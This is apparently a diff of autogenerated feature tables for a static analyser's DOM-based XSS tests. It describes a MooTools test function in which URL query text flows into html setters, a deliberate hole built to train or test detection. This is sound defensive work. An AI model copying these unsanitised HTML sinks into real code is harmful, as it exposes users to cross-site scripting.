div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:14:442:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:14:442:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:21:442:23 | set | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:21:442:23 | set | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:442:21:442:23 | set | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:21:442:23 | set | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:21:442:23 | set | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:442:25:442:40 | {"html": source} | CalleeFlexibleAccessPath | Element().set | | autogenerated/Xss/DomBasedXss/tst.js:442:25:442:40 | {"html": source} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:442:25:442:40 | {"html": source} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17655,6 +122713,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:442:25:442:40 | {"html": source} | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:442:25:442:40 | {"html": source} | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:442:25:442:40 | {"html": source} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:31 | "html" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:31 | "html" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:31 | "html" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:31 | "html" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:31 | "html" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:26:442:39 | "html": source | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:442:34:442:39 | source | CalleeFlexibleAccessPath | Element().set | | autogenerated/Xss/DomBasedXss/tst.js:442:34:442:39 | source | InputAccessPathFromCallee | 0.html | | autogenerated/Xss/DomBasedXss/tst.js:442:34:442:39 | source | InputArgumentIndex | 0 | @@ -17664,6 +122737,48 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:442:34:442:39 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:442:34:442:39 | source | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:442:34:442:39 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | exceptional return of new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | exceptional return of new Element("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | exceptional return of new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | exceptional return of new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | exceptional return of new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | new Element("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:19 | new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:31 | new Ele ... roperty | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:31 | new Ele ... roperty | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:31 | new Ele ... roperty | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:31 | new Ele ... roperty | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:31 | new Ele ... roperty | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | exceptional return of new Ele ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | exceptional return of new Ele ... source) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | exceptional return of new Ele ... source) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | exceptional return of new Ele ... source) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | exceptional return of new Ele ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | new Ele ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | new Ele ... source) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | new Ele ... source) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | new Ele ... source) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:2:443:47 | new Ele ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:6:443:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:6:443:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:443:6:443:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:6:443:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:6:443:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:14:443:18 | "div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:443:14:443:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:443:14:443:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:14:443:18 | "div" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:443:14:443:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:14:443:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:14:443:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:443:21:443:31 | setProperty | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:443:21:443:31 | setProperty | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:443:21:443:31 | setProperty | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:443:21:443:31 | setProperty | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:443:21:443:31 | setProperty | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:443:33:443:38 | "html" | CalleeFlexibleAccessPath | Element().setProperty | | autogenerated/Xss/DomBasedXss/tst.js:443:33:443:38 | "html" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:443:33:443:38 | "html" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17678,6 +122793,48 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:443:41:443:46 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:443:41:443:46 | source | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:443:41:443:46 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | exceptional return of new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | exceptional return of new Element("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | exceptional return of new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | exceptional return of new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | exceptional return of new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | new Element("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:19 | new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:33 | new Ele ... perties | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:33 | new Ele ... perties | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:33 | new Ele ... perties | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:33 | new Ele ... perties | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:33 | new Ele ... perties | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | exceptional return of new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | exceptional return of new Ele ... ource}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | exceptional return of new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | exceptional return of new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | exceptional return of new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | new Ele ... ource}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:2:444:51 | new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:6:444:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:6:444:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:444:6:444:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:6:444:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:6:444:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:14:444:18 | "div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:444:14:444:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:444:14:444:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:14:444:18 | "div" | contextSurroundingFunctionParameters | () | +| 